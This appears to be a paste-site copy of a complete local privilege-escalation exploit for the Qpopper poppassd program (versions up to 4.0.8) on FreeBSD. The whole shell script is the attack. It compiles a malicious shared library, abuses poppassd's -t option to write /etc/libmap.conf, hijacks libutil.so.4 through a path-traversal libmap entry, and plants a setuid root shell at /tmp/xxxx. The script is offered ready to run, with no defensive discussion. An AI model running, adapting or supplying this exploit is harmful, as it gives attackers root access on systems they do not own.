SHOW:
|
|
- or go back to the newest paste.
1 | ======================================================== | |
2 | Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd) | |
3 | ======================================================== | |
4 | ||
5 | ||
6 | #!/bin/sh | |
7 | ########################################################################### | |
8 | # FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ### | |
9 | # tested on FreeBSD 5.4-RELEASE ### | |
10 | ########################################################################### | |
11 | ||
12 | POPPASSD_PATH=/usr/local/bin/poppassd | |
13 | HOOKLIB=libutil.so.4 | |
14 | ||
15 | echo "" | |
16 | echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope" | |
17 | echo "" | |
18 | sleep 2 | |
19 | umask 0000 | |
20 | if [ -f /etc/libmap.conf ]; then | |
21 | echo "OOPS /etc/libmap.conf already exists.. exploit failed!" | |
22 | exit | |
23 | fi | |
24 | cat > program.c << _EOF | |
25 | #include <unistd.h> | |
26 | #include <stdio.h> | |
27 | #include <sys/types.h> | |
28 | #include <stdlib.h> | |
29 | ||
30 | void _init() | |
31 | { | |
32 | if (!geteuid()) { | |
33 | remove("/etc/libmap.conf"); | |
34 | execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL); | |
35 | } | |
36 | } | |
37 | ||
38 | _EOF | |
39 | gcc -o program.o -c program.c -fPIC | |
40 | gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles | |
41 | cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 | |
42 | echo "--- Now type ENTER ---" | |
43 | echo "" | |
44 | $POPPASSD_PATH -t /etc/libmap.conf | |
45 | echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf | |
46 | su | |
47 | if [ -f /tmp/xxxx ]; then | |
48 | echo "IT'S A ROOTSHELL!!!" | |
49 | /tmp/xxxx | |
50 | else | |
51 | echo "Sorry, exploit failed." | |
52 | fi | |
53 | ||
54 | ||
55 | ||
56 | # 056FE58749E5C4AA 1337day.com [2014-09-08] 3CFC11BFC696FCE0 # |